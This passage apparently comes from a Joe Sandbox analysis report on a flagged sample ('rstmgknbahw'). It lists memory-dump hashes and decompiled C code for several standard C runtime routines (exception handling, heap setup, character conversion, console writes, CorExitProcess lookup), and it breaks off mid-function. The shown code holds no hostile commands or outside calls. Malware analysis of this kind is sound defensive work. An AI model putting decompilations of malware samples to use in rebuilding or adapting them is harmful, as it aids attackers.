                          • Instruction Fuzzy Hash: 06D0A7B34892A09FC3554BB05C6E5F8BBE4EE973047044CE7DC4046423D5367593DA16
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a8b8a504dd55adb93bf5da8dd8576f36b9ebb75626bfd3c0edc8b2810bb1a4ee
                          • Instruction ID: 0b1793068301261d7b969954338aacf12869baa09667a5b0e746b6d16910c71f
                          • Opcode Fuzzy Hash: a8b8a504dd55adb93bf5da8dd8576f36b9ebb75626bfd3c0edc8b2810bb1a4ee
                          • Instruction Fuzzy Hash: D8E0C23100C765DFC3529BA8F4A58E17BF4BF4B2003088D8BE0868B955C620EC06C715
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2074d980514930a1d464d5e4b068b306674e6fbe9addb5848b773a2a333dd8c2
                          • Instruction ID: db469e4b2f5dd4ec2a190ff3e29bdc37c0b89620f2caa4b55a3e257cf6753cfe
                          • Opcode Fuzzy Hash: 2074d980514930a1d464d5e4b068b306674e6fbe9addb5848b773a2a333dd8c2
                          • Instruction Fuzzy Hash: 65E02B33662304DFCB157B70E45D46C37A8EF4622130009B9D422C76C0FE3EE4A0CA08
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fa8f9b8ffca45e9c8d8967e93bf46bf9929f304d778d4d610cb432a53a7ea4af
                          • Instruction ID: 54de880f3d5b79684a8b9722b8d4a5492c8f4adb9de00826dbb1b53b6052775e
                          • Opcode Fuzzy Hash: fa8f9b8ffca45e9c8d8967e93bf46bf9929f304d778d4d610cb432a53a7ea4af
                          • Instruction Fuzzy Hash: 0CD0C931661304DBCB097BB0A01D42837ADAB49245340087CD80686740EE36A860CA08
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9792fe2eeaaa43a076eaea2fb9aa9b3bd9fff409ec0c94944f7351269a744415
                          • Instruction ID: 46120a96786f46df40b07432171dad07a41731f831a7046370203c84f5bc3a2d
                          • Opcode Fuzzy Hash: 9792fe2eeaaa43a076eaea2fb9aa9b3bd9fff409ec0c94944f7351269a744415
                          • Instruction Fuzzy Hash: 60C09B71485274CED25456B1681943DB29976D5305754CC37AD01001658A76B461D959
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 82e39fedf6deee74551c16ca042c3ddfcad6d0fab409242f1f2f298d57afcc17
                          • Instruction ID: 0c1a7cf3f1cad2f8cb3bdbc3d128bd0a22e9f7aa5deb90040b388479d846ad22
                          • Opcode Fuzzy Hash: 82e39fedf6deee74551c16ca042c3ddfcad6d0fab409242f1f2f298d57afcc17
                          • Instruction Fuzzy Hash: B8B012302482080B574057F13C0CB22378C554040574004659C0CC0100F680D0E02244
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 74%
                          			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                          				char _v0;
                          				signed int _v8;
                          				intOrPtr _v524;
                          				intOrPtr _v528;
                          				void* _v532;
                          				intOrPtr _v536;
                          				char _v540;
                          				intOrPtr _v544;
                          				intOrPtr _v548;
                          				intOrPtr _v552;
                          				intOrPtr _v556;
                          				intOrPtr _v560;
                          				intOrPtr _v564;
                          				intOrPtr _v568;
                          				intOrPtr _v572;
                          				intOrPtr _v576;
                          				intOrPtr _v580;
                          				intOrPtr _v584;
                          				char _v724;
                          				intOrPtr _v792;
                          				intOrPtr _v800;
                          				char _v804;
                          				struct _EXCEPTION_POINTERS _v812;
                          				void* __edi;
                          				signed int _t40;
                          				char* _t47;
                          				char* _t49;
                          				long _t57;
                          				intOrPtr _t59;
                          				intOrPtr _t60;
                          				intOrPtr _t64;
                          				intOrPtr _t65;
                          				int _t66;
                          				intOrPtr _t68;
                          				signed int _t69;
                          
                          				_t68 = __esi;
                          				_t64 = __edx;
                          				_t59 = __ebx;
                          				_t40 =  *0x412014; // 0x58c4579
                          				_t41 = _t40 ^ _t69;
                          				_v8 = _t40 ^ _t69;
                          				_push(_t65);
                          				if(_a4 != 0xffffffff) {
                          					_push(_a4);
                          					E00401E6A(_t41);
                          					_pop(_t60);
                          				}
                          				E00402460(_t65,  &_v804, 0, 0x50);
                          				E00402460(_t65,  &_v724, 0, 0x2cc);
                          				_v812.ExceptionRecord =  &_v804;
                          				_t47 =  &_v724;
                          				_v812.ContextRecord = _t47;
                          				_v548 = _t47;
                          				_v552 = _t60;
                          				_v556 = _t64;
                          				_v560 = _t59;
                          				_v564 = _t68;
                          				_v568 = _t65;
                          				_v524 = ss;
                          				_v536 = cs;
                          				_v572 = ds;
                          				_v576 = es;
                          				_v580 = fs;
                          				_v584 = gs;
                          				asm("pushfd");
                          				_pop( *_t22);
                          				_v540 = _v0;
                          				_t49 =  &_v0;
                          				_v528 = _t49;
                          				_v724 = 0x10001;
                          				_v544 =  *((intOrPtr*)(_t49 - 4));
                          				_v804 = _a8;
                          				_v800 = _a12;
                          				_v792 = _v0;
                          				_t66 = IsDebuggerPresent();
                          				SetUnhandledExceptionFilter(0);
                          				_t57 = UnhandledExceptionFilter( &_v812);
                          				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
                          					_push(_a4);
                          					_t57 = E00401E6A(_t57);
                          				}
                          				E004018CC();
                          				return _t57;
                          			}






































                          0x0040446f
                          0x0040446f
                          0x0040446f
                          0x0040447a
                          0x0040447f
                          0x00404481
                          0x00404488
                          0x00404489
                          0x0040448b
                          0x0040448e
                          0x00404493
                          0x00404493
                          0x0040449f
                          0x004044b2
                          0x004044c0
                          0x004044c6
                          0x004044cc
                          0x004044d2
                          0x004044d8
                          0x004044de
                          0x004044e4
                          0x004044ea
                          0x004044f0
                          0x004044f6
                          0x004044fd
                          0x00404504
                          0x0040450b
                          0x00404512
                          0x00404519
                          0x00404520
                          0x00404521
                          0x0040452a
                          0x00404530
                          0x00404533
                          0x00404539
                          0x00404546
                          0x0040454f
                          0x00404558
                          0x00404561
                          0x0040456f
                          0x00404571
                          0x0040457e
                          0x00404586
                          0x00404592
                          0x00404595
                          0x0040459a
                          0x004045a1
                          0x004045a9

                          APIs
                          • IsDebuggerPresent.KERNEL32 ref: 00404567
                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                          Memory Dump Source
                          • Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                          • String ID:
                          • API String ID: 3906539128-0
                          • Opcode ID: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                          • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                          • Opcode Fuzzy Hash: 2ea22a54f0bb21e3e7ef13a2463ede0b165cda552ac7540fe10d04093127767f
                          • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E004067FE() {
                          				signed int _t3;
                          
                          				_t3 = GetProcessHeap();
                          				 *0x4132b0 = _t3;
                          				return _t3 & 0xffffff00 | _t3 != 0x00000000;
                          			}




                          0x004067fe
                          0x00406806
                          0x0040680e

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.723024476.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: HeapProcess
                          • String ID:
                          • API String ID: 54951025-0
                          • Opcode ID: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                          • Instruction ID: ab0ad82ebdde72e163074a118323e5abeae2aeda4b6cf9790db401cd62e62c3c
                          • Opcode Fuzzy Hash: 4abe4d7e697a5e334cba9e91fa50753fcf89eadab84e16c7efba8372fc9c1de6
                          • Instruction Fuzzy Hash: F7A011B0200200CBC3008F38AA8820A3AA8AA08282308C2B8A008C00A0EB388088AA08
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E004078CF(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                          				signed int _v8;
                          				int _v12;
                          				void* _v24;
                          				signed int _t49;
                          				signed int _t54;
                          				int _t56;
                          				signed int _t58;
                          				short* _t60;
                          				signed int _t64;
                          				short* _t68;
                          				int _t76;
                          				short* _t79;
                          				signed int _t85;
                          				signed int _t88;
                          				void* _t93;
                          				void* _t94;
                          				int _t96;
                          				short* _t99;
                          				int _t101;
                          				int _t103;
                          				signed int _t104;
                          				short* _t105;
                          				void* _t108;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t49 =  *0x412014; // 0x58c4579
                          				_v8 = _t49 ^ _t104;
                          				_t101 = _a20;
                          				if(_t101 > 0) {
                          					_t76 = E004080D8(_a16, _t101);
                          					_t108 = _t76 - _t101;
                          					_t4 = _t76 + 1; // 0x1
                          					_t101 = _t4;
                          					if(_t108 >= 0) {
                          						_t101 = _t76;
                          					}
                          				}
                          				_t96 = _a32;
                          				if(_t96 == 0) {
                          					_t96 =  *( *_a4 + 8);
                          					_a32 = _t96;
                          				}
                          				_t54 = MultiByteToWideChar(_t96, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t101, 0, 0);
                          				_v12 = _t54;
                          				if(_t54 == 0) {
                          					L38:
                          					E004018CC();
                          					return _t54;
                          				} else {
                          					_t93 = _t54 + _t54;
                          					_t83 = _t93 + 8;
                          					asm("sbb eax, eax");
                          					if((_t93 + 0x00000008 & _t54) == 0) {
                          						_t79 = 0;
                          						__eflags = 0;
                          						L14:
                          						if(_t79 == 0) {
                          							L36:
                          							_t103 = 0;
                          							L37:
                          							E004063D5(_t79);
                          							_t54 = _t103;
                          							goto L38;
                          						}
                          						_t56 = MultiByteToWideChar(_t96, 1, _a16, _t101, _t79, _v12);
                          						_t119 = _t56;
                          						if(_t56 == 0) {
                          							goto L36;
                          						}
                          						_t98 = _v12;
                          						_t58 = E00405989(_t83, _t119, _a8, _a12, _t79, _v12, 0, 0, 0, 0, 0);
                          						_t103 = _t58;
                          						if(_t103 == 0) {
                          							goto L36;
                          						}
                          						if((_a12 & 0x00000400) == 0) {
                          							_t94 = _t103 + _t103;
                          							_t85 = _t94 + 8;
                          							__eflags = _t94 - _t85;
                          							asm("sbb eax, eax");
                          							__eflags = _t85 & _t58;
                          							if((_t85 & _t58) == 0) {
                          								_t99 = 0;
                          								__eflags = 0;
                          								L30:
                          								__eflags = _t99;
                          								if(__eflags == 0) {
                          									L35:
                          									E004063D5(_t99);
                          									goto L36;
                          								}
                          								_t60 = E00405989(_t85, __eflags, _a8, _a12, _t79, _v12, _t99, _t103, 0, 0, 0);
                          								__eflags = _t60;
                          								if(_t60 == 0) {
                          									goto L35;
                          								}
                          								_push(0);
                          								_push(0);
                          								__eflags = _a28;
                          								if(_a28 != 0) {
                          									_push(_a28);
                          									_push(_a24);
                          								} else {
                          									_push(0);
                          									_push(0);
                          								}
                          								_t103 = WideCharToMultiByte(_a32, 0, _t99, _t103, ??, ??, ??, ??);
                          								__eflags = _t103;
                          								if(_t103 != 0) {
                          									E004063D5(_t99);
                          									goto L37;
                          								} else {
                          									goto L35;
                          								}
                          							}
                          							_t88 = _t94 + 8;
                          							__eflags = _t94 - _t88;
                          							asm("sbb eax, eax");
                          							_t64 = _t58 & _t88;
                          							_t85 = _t94 + 8;
                          							__eflags = _t64 - 0x400;
                          							if(_t64 > 0x400) {
                          								__eflags = _t94 - _t85;
                          								asm("sbb eax, eax");
                          								_t99 = E00403E3D(_t85, _t64 & _t85);
                          								_pop(_t85);
                          								__eflags = _t99;
                          								if(_t99 == 0) {
                          									goto L35;
                          								}
                          								 *_t99 = 0xdddd;
                          								L28:
                          								_t99 =  &(_t99[4]);
                          								goto L30;
                          							}
                          							__eflags = _t94 - _t85;
                          							asm("sbb eax, eax");
                          							E004018E0();
                          							_t99 = _t105;
                          							__eflags = _t99;
                          							if(_t99 == 0) {
                          								goto L35;
                          							}
                          							 *_t99 = 0xcccc;
                          							goto L28;
                          						}
                          						_t68 = _a28;
                          						if(_t68 == 0) {
                          							goto L37;
                          						}
                          						_t123 = _t103 - _t68;
                          						if(_t103 > _t68) {
                          							goto L36;
                          						}
                          						_t103 = E00405989(0, _t123, _a8, _a12, _t79, _t98, _a24, _t68, 0, 0, 0);
                          						if(_t103 != 0) {
                          							goto L37;
                          						}
                          						goto L36;
                          					}
                          					asm("sbb eax, eax");
                          					_t70 = _t54 & _t93 + 0x00000008;
                          					_t83 = _t93 + 8;
                          					if((_t54 & _t93 + 0x00000008) > 0x400) {
                          						__eflags = _t93 - _t83;
                          						asm("sbb eax, eax");
                          						_t79 = E00403E3D(_t83, _t70 & _t83);
                          						_pop(_t83);
                          						__eflags = _t79;
                          						if(__eflags == 0) {
                          							goto L36;
                          						}
                          						 *_t79 = 0xdddd;
                          						L12:
                          						_t79 =  &(_t79[4]);
                          						goto L14;
                          					}
                          					asm("sbb eax, eax");
                          					E004018E0();
                          					_t79 = _t105;
                          					if(_t79 == 0) {
                          						goto L36;
                          					}
                          					 *_t79 = 0xcccc;
                          					goto L12;
                          				}
                          			}


























                          0x004078d4
                          0x004078d5
                          0x004078d6
                          0x004078dd
                          0x004078e2
                          0x004078e8
                          0x004078ee
                          0x004078f4
                          0x004078f7
                          0x004078f7
                          0x004078fa
                          0x004078fc
                          0x004078fc
                          0x004078fa
                          0x004078fe
                          0x00407903
                          0x0040790a
                          0x0040790d
                          0x0040790d
                          0x00407929
                          0x0040792f
                          0x00407934
                          0x00407ac7
                          0x00407ad2
                          0x00407ada
                          0x0040793a
                          0x0040793a
                          0x0040793d
                          0x00407942
                          0x00407946
                          0x0040799a
                          0x0040799a
                          0x0040799c
                          0x0040799e
                          0x00407abc
                          0x00407abc
                          0x00407abe
                          0x00407abf
                          0x00407ac5
                          0x00000000
                          0x00407ac5
                          0x004079af
                          0x004079b5
                          0x004079b7
                          0x00000000
                          0x00000000
                          0x004079bd
                          0x004079cf
                          0x004079d4
                          0x004079d8
                          0x00000000
                          0x00000000
                          0x004079e5
                          0x00407a1f
                          0x00407a22
                          0x00407a25
                          0x00407a27
                          0x00407a29
                          0x00407a2b
                          0x00407a77
                          0x00407a77
                          0x00407a79
                          0x00407a79
                          0x00407a7b
                          0x00407ab5
                          0x00407ab6
                          0x00000000
                          0x00407abb
                          0x00407a8f
                          0x00407a94
                          0x00407a96
                          0x00000000
                          0x00000000
                          0x00407a9a
                          0x00407a9b
                          0x00407a9c
                          0x00407a9f
                          0x00407adb
                          0x00407ade
                          0x00407aa1
                          0x00407aa1
                          0x00407aa2
                          0x00407aa2
                          0x00407aaf
                          0x00407ab1
                          0x00407ab3
                          0x00407ae4
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407ab3
                          0x00407a2d
                          0x00407a30
                          0x00407a32
                          0x00407a34
                          0x00407a36
                          0x00407a39
                          0x00407a3e
                          0x00407a59
                          0x00407a5b
                          0x00407a65
                          0x00407a67
                          0x00407a68
                          0x00407a6a
                          0x00000000
                          0x00000000
                          0x00407a6c
                          0x00407a72
                          0x00407a72
                          0x00000000
                          0x00407a72
                          0x00407a40
                          0x00407a42
                          0x00407a46
                          0x00407a4b
                          0x00407a4d
                          0x00407a4f
                          0x00000000
                          0x00000000
                          0x00407a51
                          0x00000000
                          0x00407a51
                          0x004079e7
                          0x004079ec
                          0x00000000
                          0x00000000
                          0x004079f2
                          0x004079f4
                          0x00000000
                          0x00000000
                          0x00407a10
                          0x00407a14
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00407a1a
                          0x0040794d
                          0x0040794f
                          0x00407951
                          0x00407959
                          0x00407978
                          0x0040797a
                          0x00407984
                          0x00407986
                          0x00407987
                          0x00407989
                          0x00000000
                          0x00000000
                          0x0040798f
                          0x00407995
                          0x00407995
                          0x00000000
                          0x00407995
                          0x0040795d
                          0x00407961
                          0x00407966
                          0x0040796a
                          0x00000000
                          0x00000000
                          0x00407970
                          0x00000000
                          0x00407970

                          APIs
                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00407B20,?,?,00000000), ref: 00407929
                          • __alloca_probe_16.LIBCMT ref: 00407961
                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00407B20,?,?,00000000,?,?,?), ref: 004079AF
                          • __alloca_probe_16.LIBCMT ref: 00407A46
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00407AA9
                          • __freea.LIBCMT ref: 00407AB6
                            • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                          • __freea.LIBCMT ref: 00407ABF
                          • __freea.LIBCMT ref: 00407AE4
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                          • String ID:
                          • API String ID: 3864826663-0
                          • Opcode ID: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                          • Instruction ID: 2b56c59f559f8582b2a4feb05c221e86bbfe0f9b068744966d06d01a738823cf
                          • Opcode Fuzzy Hash: dda1088f7075954fbe6023d44dc497f251e567ba65003bd3d831429d24d78928
                          • Instruction Fuzzy Hash: 8051D572B04216ABDB259F64CC41EAF77A9DB40760B15463EFC04F62C1DB38ED50CAA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00408223(intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                          				signed int _v8;
                          				signed char _v15;
                          				char _v16;
                          				void _v24;
                          				short _v28;
                          				char _v31;
                          				void _v32;
                          				long _v36;
                          				intOrPtr _v40;
                          				void* _v44;
                          				signed int _v48;
                          				signed char* _v52;
                          				long _v56;
                          				int _v60;
                          				void* __ebx;
                          				signed int _t78;
                          				signed int _t80;
                          				int _t86;
                          				void* _t93;
                          				long _t96;
                          				void _t104;
                          				void* _t111;
                          				signed int _t115;
                          				signed int _t118;
                          				signed char _t123;
                          				signed char _t128;
                          				intOrPtr _t129;
                          				signed int _t131;
                          				signed char* _t133;
                          				intOrPtr* _t136;
                          				signed int _t138;
                          				void* _t139;
                          
                          				_t78 =  *0x412014; // 0x58c4579
                          				_v8 = _t78 ^ _t138;
                          				_t80 = _a8;
                          				_t118 = _t80 >> 6;
                          				_t115 = (_t80 & 0x0000003f) * 0x30;
                          				_t133 = _a12;
                          				_v52 = _t133;
                          				_v48 = _t118;
                          				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x4130a0 + _t118 * 4)) + _t115 + 0x18));
                          				_v40 = _a16 + _t133;
                          				_t86 = GetConsoleCP();
                          				_t136 = _a4;
                          				_v60 = _t86;
                          				 *_t136 = 0;
                          				 *((intOrPtr*)(_t136 + 4)) = 0;
                          				 *((intOrPtr*)(_t136 + 8)) = 0;
                          				while(_t133 < _v40) {
                          					_v28 = 0;
                          					_v31 =  *_t133;
                          					_t129 =  *((intOrPtr*)(0x4130a0 + _v48 * 4));
                          					_t123 =  *(_t129 + _t115 + 0x2d);
                          					if((_t123 & 0x00000004) == 0) {
                          						if(( *(E00405FC6(_t115, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                          							_push(1);
                          							_push(_t133);
                          							goto L8;
                          						} else {
                          							if(_t133 >= _v40) {
                          								_t131 = _v48;
                          								 *((char*)( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2e)) =  *_t133;
                          								 *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) =  *( *((intOrPtr*)(0x4130a0 + _t131 * 4)) + _t115 + 0x2d) | 0x00000004;
                          								 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                          							} else {
                          								_t111 = E00407222( &_v28, _t133, 2);
                          								_t139 = _t139 + 0xc;
                          								if(_t111 != 0xffffffff) {
                          									_t133 =  &(_t133[1]);
                          									goto L9;
                          								}
                          							}
                          						}
                          					} else {
                          						_t128 = _t123 & 0x000000fb;
                          						_v16 =  *((intOrPtr*)(_t129 + _t115 + 0x2e));
                          						_push(2);
                          						_v15 = _t128;
                          						 *(_t129 + _t115 + 0x2d) = _t128;
                          						_push( &_v16);
                          						L8:
                          						_push( &_v28);
                          						_t93 = E00407222();
                          						_t139 = _t139 + 0xc;
                          						if(_t93 != 0xffffffff) {
                          							L9:
                          							_t133 =  &(_t133[1]);
                          							_t96 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                          							_v56 = _t96;
                          							if(_t96 != 0) {
                          								if(WriteFile(_v44,  &_v24, _t96,  &_v36, 0) == 0) {
                          									L19:
                          									 *_t136 = GetLastError();
                          								} else {
                          									 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 8)) - _v52 + _t133;
                          									if(_v36 >= _v56) {
                          										if(_v31 != 0xa) {
                          											goto L16;
                          										} else {
                          											_t104 = 0xd;
                          											_v32 = _t104;
                          											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                          												goto L19;
                          											} else {
                          												if(_v36 >= 1) {
                          													 *((intOrPtr*)(_t136 + 8)) =  *((intOrPtr*)(_t136 + 8)) + 1;
                          													 *((intOrPtr*)(_t136 + 4)) =  *((intOrPtr*)(_t136 + 4)) + 1;
                          													goto L16;
                          												}
                          											}
                          										}
                          									}
                          								}
                          							}
                          						}
                          					}
                          					goto L20;
                          					L16:
                          				}
                          				L20:
                          				E004018CC();
                          				return _t136;
                          			}



































                          0x0040822b
                          0x00408232
                          0x00408235
                          0x0040823d
                          0x00408241
                          0x0040824d
                          0x00408250
                          0x00408253
                          0x0040825a
                          0x00408262
                          0x00408265
                          0x0040826b
                          0x00408271
                          0x00408276
                          0x00408278
                          0x0040827b
                          0x00408280
                          0x0040828a
                          0x00408291
                          0x00408294
                          0x0040829b
                          0x004082a2
                          0x004082ce
                          0x004082f4
                          0x004082f6
                          0x00000000
                          0x004082d0
                          0x004082d3
                          0x0040839a
                          0x004083a6
                          0x004083b1
                          0x004083b6
                          0x004082d9
                          0x004082e0
                          0x004082e5
                          0x004082eb
                          0x004082f1
                          0x00000000
                          0x004082f1
                          0x004082eb
                          0x004082d3
                          0x004082a4
                          0x004082a8
                          0x004082ab
                          0x004082b1
                          0x004082b3
                          0x004082b6
                          0x004082ba
                          0x004082f7
                          0x004082fa
                          0x004082fb
                          0x00408300
                          0x00408306
                          0x0040830c
                          0x0040831b
                          0x00408321
                          0x00408327
                          0x0040832c
                          0x00408348
                          0x004083bb
                          0x004083c1
                          0x0040834a
                          0x00408352
                          0x0040835b
                          0x00408361
                          0x00000000
                          0x00408363
                          0x00408365
                          0x00408368
                          0x00408381
                          0x00000000
                          0x00408383
                          0x00408387
                          0x00408389
                          0x0040838c
                          0x00000000
                          0x0040838c
                          0x00408387
                          0x00408381
                          0x00408361
                          0x0040835b
                          0x00408348
                          0x0040832c
                          0x00408306
                          0x00000000
                          0x0040838f
                          0x0040838f
                          0x004083c3
                          0x004083cd
                          0x004083d5

                          APIs
                          • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00408998,?,00000000,?,00000000,00000000), ref: 00408265
                          • __fassign.LIBCMT ref: 004082E0
                          • __fassign.LIBCMT ref: 004082FB
                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00408321
                          • WriteFile.KERNEL32(?,?,00000000,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408340
                          • WriteFile.KERNEL32(?,?,00000001,00408998,00000000,?,?,?,?,?,?,?,?,?,00408998,?), ref: 00408379
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                          • String ID:
                          • API String ID: 1324828854-0
                          • Opcode ID: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                          • Instruction ID: d35ea3bc0149cbeaf608d2e35f82b202305ea3b4574a465905668c698b2cd014
                          • Opcode Fuzzy Hash: 6526cd7982371344a6a1e48cd2b7cf140f34c910ae76ba14c8618a3c70808cc2
                          • Instruction Fuzzy Hash: 2751C070900209EFCB10CFA8D985AEEBBF4EF49300F14816EE995F3391DA349941CB68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 27%
                          			E00403632(void* __ecx, intOrPtr _a4) {
                          				signed int _v8;
                          				signed int _v12;
                          				signed int _t10;
                          				int _t12;
                          				int _t18;
                          				signed int _t20;
                          
                          				_t10 =  *0x412014; // 0x58c4579
                          				_v8 = _t10 ^ _t20;
                          				_v12 = _v12 & 0x00000000;
                          				_t12 =  &_v12;
                          				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t12, __ecx, __ecx);
                          				if(_t12 != 0) {
                          					_t12 = GetProcAddress(_v12, "CorExitProcess");
                          					_t18 = _t12;
                          					if(_t18 != 0) {
                          						E0040C15C();
                          						_t12 =  *_t18(_a4);
                          					}
                          				}
                          				if(_v12 != 0) {
                          					_t12 = FreeLibrary(_v12);
                          				}
                          				E004018CC();
                          				return _t12;
                          			}









                          0x00403639
                          0x00403640
                          0x00403643
                          0x00403647
                          0x00403652
                          0x0040365a
                          0x00403665
                          0x0040366b
                          0x0040366f
                          0x00403676
                          0x0040367c
                          0x0040367c
                          0x0040367e
                          0x00403683
                          0x00403688
                          0x00403688
                          0x00403693
                          0x0040369b

                          APIs
                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                          • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressFreeHandleLibraryModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 4061214504-1276376045
                          • Opcode ID: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                          • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                          • Opcode Fuzzy Hash: 829d2906a4e1aa3164176bf7ab706f29f81f0af0ee9c7b1f46b6600de564c79c
                          • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 79%
                          			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
